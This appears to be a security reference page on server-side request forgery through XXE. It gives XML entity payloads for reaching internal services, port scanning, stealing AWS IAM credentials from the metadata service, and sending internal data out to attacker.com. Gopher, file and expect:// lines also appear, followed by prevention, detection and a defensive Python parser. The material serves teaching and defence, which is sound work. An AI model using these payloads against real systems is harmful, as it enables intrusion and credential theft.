🔴Critical8.6

SSRF via XXE

Exploiting XXE vulnerabilities to perform Server-Side Request Forgery attacks, accessing internal networks and services.

CWE-918: Server-Side Request Forgery (SSRF)OWASP Top 10:2021 - A10: Server-Side Request Forgery

Overview

Server-Side Request Forgery (SSRF) via XXE allows attackers to make the vulnerable server send HTTP requests to arbitrary destinations. This bypasses network security controls and enables access to:

Internal Network Access:

Internal web services (databases, admin panels)
Cloud metadata services (AWS, GCP, Azure)
Internal APIs not exposed to internet
Localhost services (Redis, Memcached, Elasticsearch)

Attack Impact:

Access cloud instance credentials
Port scanning internal networks
Exploit internal services
Bypass firewall and network segmentation
Read internal documentation/APIs
Access admin interfaces

Why XXE Enables SSRF: XML parsers support multiple URI schemes in SYSTEM identifiers:

http:// and https:// - HTTP requests
file:// - Local file access
ftp:// - FTP connections
gopher:// - Protocol smuggling
jar:// - Java Archive protocol
expect:// - Command execution (if enabled)

Basic SSRF Payload

XMLbasic-ssrf.xml⚠️ Vulnerable
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "http://internal-server.local/admin">
]>
<root>
  <data>&xxe;</data>
</root>

<!-- Server makes HTTP request to http://internal-server.local/admin
     Response may be displayed in application output -->

AWS Metadata Service Attack

XMLaws-metadata.xml⚠️ Vulnerable
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<root>
  <data>&xxe;</data>
</root>

<!-- Returns AWS IAM role name, then fetch credentials: -->
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE-NAME]">
]>
<root><data>&xxe;</data></root>

<!-- Returns:
{
  "AccessKeyId": "ASIA...",
  "SecretAccessKey": "...",
  "Token": "..."
} -->

Internal Port Scanning

XMLport-scan.xml⚠️ Vulnerable
<!-- Scan localhost ports -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "http://127.0.0.1:80">
]>
<root><data>&xxe;</data></root>

<!-- Try different ports to enumerate services: -->
<!-- http://127.0.0.1:22 - SSH -->
<!-- http://127.0.0.1:3306 - MySQL -->
<!-- http://127.0.0.1:6379 - Redis -->
<!-- http://127.0.0.1:9200 - Elasticsearch -->
<!-- http://127.0.0.1:8080 - Admin panel -->

<!-- Scan internal network: -->
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "http://192.168.1.1:80">
]>
<root><data>&xxe;</data></root>

Blind SSRF Detection

XMLblind-ssrf.xml⚠️ Vulnerable
<!-- Blind SSRF when output not visible -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY % remote SYSTEM "http://attacker.com/callback">
  %remote;
]>
<root/>

<!-- Monitor attacker.com access logs for connection -->
<!-- If connection received, SSRF is possible -->

<!-- Out-of-band SSRF with data exfiltration: -->
<!-- xxe.dtd on attacker server: -->
<!ENTITY % internal SYSTEM "http://internal-api.local/secret">
<!ENTITY % wrapper "<!ENTITY &#x25; send SYSTEM 'http://attacker.com/log?data=%internal;'>">
%wrapper;
%send;

Protocol Scheme Exploitation

HTTP/HTTPS: Most common for SSRF, access internal HTTP services:

FTP: Access internal FTP servers:

ftp://internal-ftp.local/
ftp://192.168.1.50:21/

Gopher (Advanced): Multi-protocol exploitation, can abuse Redis, SMTP, etc:

gopher://127.0.0.1:6379/_SET%20key%20value
Used to send arbitrary data to TCP services
Can exploit unprotected internal services

File (Local Access): Read local files (file disclosure):

file:///etc/passwd
file:///c:/windows/win.ini

Jar (Java): Java-specific, can trigger secondary SSRF:

jar:http://attacker.com/file.jar!/

Expect (Dangerous): If PHP expect:// wrapper enabled, RCE possible:

expect://whoami

Common Internal Targets

Cloud Metadata Services:

AWS: http://169.254.169.254/latest/meta-data/ Google Cloud: http://metadata.google.internal/computeMetadata/v1/ Azure: http://169.254.169.254/metadata/instance?api-version=2021-02-01 DigitalOcean: http://169.254.169.254/metadata/v1/

Internal Services:

http://localhost:6379 - Redis (often no auth) http://localhost:9200 - Elasticsearch http://localhost:5984 - CouchDB http://localhost:8086 - InfluxDB http://localhost:3000 - Grafana http://localhost:8080 - Jenkins/Tomcat

Network Devices:

http://192.168.1.1 - Router admin http://192.168.0.1 - Gateway http://10.0.0.1 - Internal router

Kubernetes:

https://kubernetes.default.svc/ http://127.0.0.1:10250 - Kubelet API http://127.0.0.1:10255 - Kubelet read-only

Real-World Exploitation Example

XMLreal-world-ssrf.xml⚠️ Vulnerable
<!-- Step 1: Discover internal services -->
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY test SYSTEM "http://127.0.0.1:6379">]>
<root>&test;</root>

<!-- Response might show Redis banner -->

<!-- Step 2: Access cloud metadata -->
<!DOCTYPE root [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">]>
<root>&xxe;</root>

<!-- Returns: "web-server-role" -->

<!-- Step 3: Fetch IAM credentials -->
<!DOCTYPE root [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/web-server-role">]>
<root>&xxe;</root>

<!-- Returns full AWS credentials:
{
  "AccessKeyId": "ASIAXXX...",
  "SecretAccessKey": "wJalrXXX...",
  "Token": "IQoJb3XXX...",
  "Expiration": "2024-01-01T12:00:00Z"
}

Attacker now has AWS credentials! -->

SSRF Prevention via XXE

Primary Defense - Disable External Entities: Disable all external entity processing in XML parsers (see prevention guides)

Network-Level Controls:

Outbound Filtering: • Block outbound HTTP from application servers • Whitelist only required external hosts • Block private IP ranges (RFC 1918) • Block cloud metadata IPs (169.254.169.254)
Network Segmentation: • Isolate application servers from sensitive internal networks • Use separate VPCs/VLANs • Implement micro-segmentation
IMDSv2 (AWS): • Require token-based metadata service (IMDSv2) • Prevents SSRF to metadata service • aws ec2 modify-instance-metadata-options --http-tokens required

Application-Level:

Input Validation: • Reject DOCTYPE declarations • Reject XML containing http:// in ENTITY definitions • Validate and sanitize all XML input
Monitoring: • Alert on outbound connections from XML parsers • Monitor access to cloud metadata services • Log unusual internal network connections

Detection Techniques

Code Review:

XML parsers without external entity restrictions
Applications accepting user-supplied XML
Missing network egress controls
Cloud instances without IMDSv2

Dynamic Testing:

Basic Test: Submit XML with http:// entity pointing to attacker-controlled server Monitor for incoming connection
Port Scan: Try different localhost ports Observe timing differences (open vs closed ports)
Cloud Metadata: Target 169.254.169.254 Look for cloud instance data in response
Internal Service Access: Target common internal IPs/ports Check for service banners or data in response

Network Monitoring:

Unexpected outbound HTTP from application servers
Connections to private IP ranges
Access to cloud metadata IPs
Unusual DNS queries

Secure Implementation

Pythonsecure_ssrf_prevention.py✓ Secure
from defusedxml.lxml import fromstring
import ipaddress
import socket

class SecureXMLProcessor:
    
    # Blocked IP ranges for SSRF prevention
    BLOCKED_RANGES = [
        ipaddress.ip_network('127.0.0.0/8'),      # Loopback
        ipaddress.ip_network('10.0.0.0/8'),       # Private
        ipaddress.ip_network('172.16.0.0/12'),    # Private
        ipaddress.ip_network('192.168.0.0/16'),   # Private
        ipaddress.ip_network('169.254.0.0/16'),   # Link-local/Metadata
    ]
    
    def is_blocked_ip(self, hostname):
        try:
            ip = ipaddress.ip_address(socket.gethostbyname(hostname))
            for blocked in self.BLOCKED_RANGES:
                if ip in blocked:
                    return True
        except:
            pass
        return False
    
    def parse_xml(self, xml_data):
        # defusedxml blocks XXE by default
        tree = fromstring(xml_data)
        
        # Additional validation
        if b'<!DOCTYPE' in xml_data or b'<!ENTITY' in xml_data:
            raise ValueError("DOCTYPE/ENTITY not allowed")
        
        return tree